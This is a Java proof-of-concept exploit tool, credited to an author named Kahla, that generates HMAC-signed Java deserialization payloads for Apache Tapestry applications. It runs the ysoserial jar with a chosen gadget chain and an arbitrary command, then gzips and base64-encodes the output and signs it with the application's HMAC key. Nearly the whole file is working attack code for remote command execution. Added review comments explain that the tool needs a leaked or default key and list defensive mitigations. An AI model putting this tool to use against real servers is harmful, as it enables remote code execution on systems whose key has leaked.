POC / Exploit.java JAVA
import java.io.*;
import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;
import java.nio.charset.StandardCharsets;
import java.security.InvalidKeyException;
import java.security.NoSuchAlgorithmException;
import org.apache.commons.codec.binary.Base64;
/**
 * Command-line proof of concept that prints a signed, serialized Java payload
 * in the form {@code base64(HMAC-SHA1(key, data)) + ":" + base64(data)}.
 *
 * <p>{@code data} is whatever the external ysoserial jar writes to stdout,
 * gzip-compressed by the shell pipeline built in {@link #main}. The MAC is
 * keyed with the first command-line argument, which the original author
 * describes as the "tapestry key" (presumably the application's HMAC
 * passphrase, e.g. the value configured as {@code tapestry.hmac-passphrase};
 * confirm against the target framework version).
 *
 * <p>Reviewer note for defenders: nothing here breaks HMAC-SHA1. The tool only
 * works for someone who already holds the key, so the MAC stops being an
 * integrity control the moment that key leaks or is left at a known value.
 * A valid tag must therefore not be treated as proof that the serialized data
 * is benign. After a suspected key disclosure, rotate the key and restrict
 * which classes the application will deserialize (allow-list or
 * {@code ObjectInputFilter}); removing gadget libraries from the classpath
 * reduces the impact further.
 *
 * <p>Depends on Apache Commons Codec ({@code Base64}) and on a local
 * ysoserial jar plus {@code sh}, {@code gzip}, {@code base64} and {@code tr}.
 */
public class Exploit {
// args[0]: Tapestry HMAC key
// args[1]: ysoserial payload type (gadget chain name)
// args[2]: command embedded in the generated payload
    // JCA algorithm name used both for Mac.getInstance and for the SecretKeySpec.
    private static final String HMAC_SHA1 = "HmacSHA1";

    /**
     * Runs {@code command} on the local machine and returns its standard output.
     *
     * <p>Output is read line by line and the lines are concatenated without
     * any separator, so line breaks in the child's output are dropped.
     * Standard error is never read and the exit status is never checked.
     *
     * @param command command line handed to {@code Runtime.exec(String)}; that
     *                overload splits on whitespace and does no shell quoting
     * @return the concatenated stdout, or the literal string {@code "ERROR"}
     *         if an {@code IOException} occurs
     */
    public static String run(String command){
	try {
    	//	String command="sh -c $@|sh . echo java -jar ysoserial-master-d367e379d9-1.jar CommonsBeanutils1 ls|gzip|base64|tr -d \"\n\"";
		String result="";
  		Process process = Runtime.getRuntime().exec(command);
		BufferedReader reader = new BufferedReader(
       	        new InputStreamReader(process.getInputStream()));
  		String line;
    		while ((line = reader.readLine()) != null) {
        		result=result+line;
    		}
		// NOTE(review): not reached if readLine() throws, so the reader leaks on
		// that path; the child process is also never waited on.
		reader.close();
		return result ;
	} 
	catch (IOException e) {
    		e.printStackTrace();
		// Sentinel value, not an exception: the caller in main() does not check
		// for it and goes on to decode and sign the string "ERROR".
		return "ERROR";
	}
}

    /**
     * Builds the ysoserial pipeline from the three arguments, MACs its output
     * with the supplied key and prints {@code <base64 tag>:<base64 payload>}.
     *
     * @param args {@code [Tapestry Key] [Ysoserial Payload] [Command To Execute]}
     */
    public static void main(String[] args) {
      if( args.length <3)
	{
		System.out.println("[Usage]: java -cp commons-codec-1.15/commons-codec-1.15.jar:. Exploit [Tapestry Key] [Ysoserial Payload] [Command To Execute]");
		// NOTE(review): a usage error still exits with status 0.
		System.exit(0);
	}



	Mac sha1Hmac;
        byte[] result;
        final String key = args[0];
	final String type= args[1];
	// args[2] is concatenated into a shell wrapper unescaped.
	final String command="sh -c $@|sh . echo "+args[2];
        try {
            // The key is used as raw UTF-8 bytes; no key derivation is applied.
            final byte[] byteKey = key.getBytes(StandardCharsets.UTF_8);
            sha1Hmac = Mac.getInstance(HMAC_SHA1);
            SecretKeySpec keySpec = new SecretKeySpec(byteKey, HMAC_SHA1);
            sha1Hmac.init(keySpec);
	    // type and command are spliced into a second shell pipeline that runs
	    // the ysoserial jar and pipes its output through gzip and base64.
	    // Both values come straight from the command line with no validation.
	    String ysoCommand="sh -c $@|sh . echo java -jar ysoserial-master-d367e379d9-1.jar "+type+" '"+command+"'|gzip|base64|tr -d \"\n\"";
	    String payload=run(ysoCommand);
            // getBytes() with no argument uses the platform default charset;
            // the input is expected to be base64 text here.
            byte[] array = payload.getBytes();
	    // The MAC covers the decoded bytes (the gzip stream), not the base64
	    // text that is printed.
	    byte[] b64out=Base64.decodeBase64(array);
	    sha1Hmac.update(b64out);
	    byte[] macData = sha1Hmac.doFinal();
            result = Base64.encodeBase64(macData);
	    // Output format: base64(tag) + ":" + base64(gzip(serialized object)).
	    System.out.println(new String(result)+":"+payload);
        } catch ( InvalidKeyException | NoSuchAlgorithmException e) {
            e.printStackTrace();
        } finally {
            // NOTE(review): this banner is printed unconditionally, including
            // after a caught exception or when run() returned "ERROR", so it
            // is not evidence that a usable payload was produced.
            System.out.println("Payload generated successfully!\nAuthor: Kahla");
        }
    }
}